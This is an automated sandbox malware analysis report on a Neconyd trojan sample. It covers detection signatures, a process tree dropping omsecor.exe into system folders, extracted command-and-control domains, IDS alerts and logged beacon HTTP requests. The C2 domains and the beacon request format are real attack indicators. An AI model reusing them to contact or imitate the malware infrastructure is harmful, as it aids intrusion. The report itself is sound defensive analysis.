Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cOviNFmw21.exe

Overview

General Information

Sample name:cOviNFmw21.exe
renamed because original name is a hash value
Original sample name:7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f.exe
Analysis ID:1569326
MD5:73e5f0f01bf8368b8b82432b027610e5
SHA1:ecf068b47a2747e0ef0286c6f9d03f2f8aacfaa7
SHA256:7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f
Tags:exeuser-adrian__luca
Infos:

Detection

Neconyd
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cOviNFmw21.exe (PID: 5344 cmdline: "C:\Users\user\Desktop\cOviNFmw21.exe" MD5: 73E5F0F01BF8368B8B82432B027610E5)
    • omsecor.exe (PID: 3808 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 9CB842FFDA5CC91A433FD8C8655C0678)
      • omsecor.exe (PID: 1732 cmdline: C:\Windows\System32\omsecor.exe MD5: 647527DE20AF8BB173C26019E8811EED)
        • omsecor.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 647527DE20AF8BB173C26019E8811EED)
  • cleanup
{"C2 url": ["http://mkkuei4kdsz.com/", "http://lousta.net/", "http://ow5dirasuek.com/"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: cOviNFmw21.exe PID: 5344JoeSecurity_NeconydYara detected NeconydJoe Security
    Process Memory Space: omsecor.exe PID: 3808JoeSecurity_NeconydYara detected NeconydJoe Security
      Process Memory Space: omsecor.exe PID: 1732JoeSecurity_NeconydYara detected NeconydJoe Security
        Process Memory Space: omsecor.exe PID: 6904JoeSecurity_NeconydYara detected NeconydJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T18:04:08.431834+010020169981A Network Trojan was detected192.168.2.749699193.166.255.17180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T18:04:36.659257+010020181411A Network Trojan was detected52.34.198.22980192.168.2.749748TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T18:04:36.659257+010020377711A Network Trojan was detected52.34.198.22980192.168.2.749748TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T18:04:10.619663+010020157861Malware Command and Control Activity Detected192.168.2.749699193.166.255.17180TCP
          2024-12-05T18:04:32.754783+010020157861Malware Command and Control Activity Detected192.168.2.749700193.166.255.17180TCP
          2024-12-05T18:04:34.471615+010020157861Malware Command and Control Activity Detected192.168.2.74974215.197.204.5680TCP
          2024-12-05T18:04:36.659210+010020157861Malware Command and Control Activity Detected192.168.2.74974852.34.198.22980TCP
          2024-12-05T18:04:59.095440+010020157861Malware Command and Control Activity Detected192.168.2.749754193.166.255.17180TCP
          2024-12-05T18:05:21.253614+010020157861Malware Command and Control Activity Detected192.168.2.749803193.166.255.17180TCP
          2024-12-05T18:05:22.615655+010020157861Malware Command and Control Activity Detected192.168.2.74985115.197.204.5680TCP
          2024-12-05T18:05:24.218147+010020157861Malware Command and Control Activity Detected192.168.2.74985752.34.198.22980TCP
          2024-12-05T18:05:46.346450+010020157861Malware Command and Control Activity Detected192.168.2.749862193.166.255.17180TCP
          2024-12-05T18:06:08.472191+010020157861Malware Command and Control Activity Detected192.168.2.749913193.166.255.17180TCP
          2024-12-05T18:06:09.821016+010020157861Malware Command and Control Activity Detected192.168.2.74996515.197.204.5680TCP
          2024-12-05T18:06:11.428062+010020157861Malware Command and Control Activity Detected192.168.2.74996952.34.198.22980TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: cOviNFmw21.exeAvira: detected
          Source: http://lousta.net/54/325.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/402/288.htmleAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEMAvira URL Cloud: Label: phishing
          Source: http://lousta.net/115/685.html53Avira URL Cloud: Label: phishing
          Source: http://lousta.net/352/26.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/352/26.htmls0Avira URL Cloud: Label: phishing
          Source: http://lousta.net/158/950.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/697/241.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/616/595.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/697/241.htmllAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/56/763.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/910/77.htmlCjAvira URL Cloud: Label: phishing
          Source: http://lousta.net/352/26.html3418276Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/372/940.htmljAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/697/241.htmlasuek.comAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/697/241.html/Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/iAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/56/763.htmlWI/Avira URL Cloud: Label: phishing
          Source: http://lousta.net/115/685.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/352/26.htmlz0oAvira URL Cloud: Label: phishing
          Source: http://lousta.net/Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/618/507.html;Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/56/763.htmlujAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/618/507.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/lousta.netAvira URL Cloud: Label: phishing
          Source: http://lousta.net/54/325.htmlwshqos.dll.muiAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/618/507.html%Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconAvira URL Cloud: Label: phishing
          Source: http://lousta.net/jAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/910/77.htmlIIMAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/372/940.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/594/342.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/taAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/en-USAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/910/77.html0#=Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/910/77.html$#Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/Avira URL Cloud: Label: phishing
          Source: http://lousta.net/562/345.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/56/763.htmlEIYAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/56/763.html-FAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/56/763.html%Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/910/77.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/697/241.html~xAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/402/288.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/352/26.htmle1NAvira URL Cloud: Label: phishing
          Source: C:\Users\user\AppData\Roaming\omsecor.exeAvira: detection malicious, Label: HEUR/AGEN.1317135
          Source: C:\Windows\SysWOW64\omsecor.exeAvira: detection malicious, Label: HEUR/AGEN.1317135
          Source: cOviNFmw21.exeMalware Configuration Extractor: Neconyd {"C2 url": ["http://mkkuei4kdsz.com/", "http://lousta.net/", "http://ow5dirasuek.com/"]}
          Source: C:\Users\user\AppData\Roaming\omsecor.exeReversingLabs: Detection: 95%
          Source: cOviNFmw21.exeReversingLabs: Detection: 97%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Roaming\omsecor.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\omsecor.exeJoe Sandbox ML: detected
          Source: cOviNFmw21.exeJoe Sandbox ML: detected
          Source: cOviNFmw21.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040ABD9 FindFirstFileW,FindClose,1_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040ABD9 FindFirstFileW,FindClose,11_2_0040ABD9

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49699 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49742 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49700 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49748 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49803 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49851 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49754 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49857 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49862 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49913 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49969 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49965 -> 15.197.204.56:80
          Source: Malware configuration extractorURLs: http://mkkuei4kdsz.com/
          Source: Malware configuration extractorURLs: http://lousta.net/
          Source: Malware configuration extractorURLs: http://ow5dirasuek.com/
          Source: global trafficHTTP traffic detected: GET /616/595.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /616/595.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /616/595.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /562/345.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /910/77.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /56/763.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /115/685.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /54/325.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /402/288.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /372/940.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0
          Source: global trafficHTTP traffic detected: GET /158/950.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /352/26.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /697/241.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /618/507.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0
          Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
          Source: Joe Sandbox ViewIP Address: 52.34.198.229 52.34.198.229
          Source: Joe Sandbox ViewASN Name: FUNETASFI FUNETASFI
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
          Source: Network trafficSuricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.7:49699 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.7:49748
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.7:49748
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_00407036 DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,1_2_00407036
          Source: global trafficHTTP traffic detected: GET /616/595.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /616/595.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /616/595.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /562/345.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /910/77.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /56/763.html HTTP/1.1From: 133778918465242887Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;Host: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /115/685.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /54/325.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /402/288.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /372/940.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0
          Source: global trafficHTTP traffic detected: GET /158/950.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /352/26.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /697/241.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /618/507.html HTTP/1.1From: 133778973683427860Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0
          Source: global trafficDNS traffic detected: DNS query: lousta.net
          Source: global trafficDNS traffic detected: DNS query: mkkuei4kdsz.com
          Source: global trafficDNS traffic detected: DNS query: ow5dirasuek.com
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2499073566.0000000000195000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/115/685.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/115/685.html53
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/158/950.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/352/26.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/352/26.html3418276
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/352/26.htmle1N
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/352/26.htmls0
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/352/26.htmlz0o
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/54/325.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/54/325.htmlwshqos.dll.mui
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/345.html
          Source: omsecor.exe, 0000000F.00000002.2500201090.0000000000640000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2499073566.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/594/342.html
          Source: omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/616/595.html
          Source: omsecor.exe, 0000000F.00000002.2500201090.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/j
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/402/288.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/402/288.htmle
          Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/697/241.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/697/241.html/
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/697/241.htmlasuek.com
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/697/241.htmll
          Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/697/241.html~x
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/910/77.html
          Source: omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/910/77.html$#
          Source: omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/910/77.html0#=
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/910/77.htmlCj
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/910/77.htmlIIM
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/i
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/372/940.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/372/940.htmlj
          Source: omsecor.exe, 00000002.00000002.1550915229.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/56/763.html
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/56/763.html%
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/56/763.html-F
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/56/763.htmlEIY
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/56/763.htmlWI/
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/56/763.htmluj
          Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2497707678.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/618/507.html
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/618/507.html%
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/618/507.html;
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/en-US
